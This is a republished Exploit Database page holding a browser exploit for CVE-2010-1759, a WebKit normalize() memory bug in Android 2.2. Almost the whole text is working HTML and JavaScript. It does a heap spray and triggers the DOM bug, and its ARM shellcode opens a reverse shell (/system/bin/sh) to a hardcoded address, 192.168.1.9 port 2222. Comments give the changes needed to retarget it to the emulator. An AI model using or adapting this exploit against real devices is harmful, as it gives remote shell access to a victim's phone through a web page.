Webkit Normalize Bug – Android 2.2

• Exploit Database
• 113 阅读

• 作者： MJ Keith
  日期： 2012-02-01
• 类别：

  • remote
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/18446/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123

  <!--   CVE-2010-1759 webkit normalize bug Tested on Moto Droidx2 running 2.2. Droidx2 running 2.3 is vulnerable but exploit fails due to non-executable heap. Still working on a way around that :) 2.1 - 2.3 emulator. The changes needed are documented in the code. The emulator is less consistent than the real phone Author: MJ Keith mjkeith[at]evilhippie.org   --> <p>LOADING... </p> <div id="test1"></div> <div id="test2"></div> <div id="test3"></div>   <script>     var elem1 = document.getElementById("test1"); var elem2 = document.getElementById("test2"); var elem3 = document.getElementById("test3");   function spray() { for (var i = 0; i < 180000; i++) {var s = new String(unescape("\u0052\u0052")); } // "\u0056\u0056" FOR EMULATOR   var scode = unescape("\u5200\u5200");// "\u0058\u0058" FOR EMULATOR var scode2 = unescape("\u5005\ue1a0"); var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002"); shell += unescape("\uae08"); // Port = 2222 shell += unescape("\ua8c0\u0901"); // IP = 192.168.1.9// "\u000a\u0202" FOR EMULATOR shell += unescape("\u2000\u2000"); // Port = 2222   do { scode += scode; scode2 += scode2;   } while (scode.length<=0x1000); scode2 += shell target = new Array(); for(i = 0; i < 141; i++){// CHANGE 141 TO 201 FOR EMULATOR   if (i<100){ target[i] = scode;} if (i>100){ target[i] = scode2;}   document.write(target[i]); document.write("<br />"); if (i>140){ // CHANGE 140 TO 200 FOR EMULATOR   document.write("<br />");}   } }   function handler1() { elem1.removeAttribute("b"); spray(); }       function handler2() { elem2.removeAttribute("b"); spray(); }     function handler3() { elem3.removeAttribute("b"); spray(); }         function slowdown() { for (var i = 0; i < 120; i++) { console.log(&apos;slow&apos; + i);     if (i > 110 ){ elem1.normalize(); elem2.normalize(); elem3.normalize(); } } }       elem1.setAttribute("b", "a"); elem1.attributes[0].appendChild(document.createTextNode("hi")); elem1.attributes[0].addEventListener("DOMSubtreeModified", handler2,false); document.body.offsetTop;     slowdown();// COMMENT OUT THIS FUNCTION CALL FOR EMULATOR   //elem1.normalize(); // UN-COMMENT THIS LINE FOR EMULATOR document.body.offsetTop;     elem2.setAttribute("b", "a"); elem2.attributes[0].appendChild(document.createTextNode("hi")); elem2.attributes[0].addEventListener("DOMSubtreeModified", handler2,false); document.body.offsetTop;   elem2.normalize();     elem3.setAttribute("b", "a"); elem3.attributes[0].appendChild(document.createTextNode("hi")); elem3.attributes[0].addEventListener("DOMSubtreeModified", handler3,false); document.body.offsetTop;   elem3.normalize();     </script>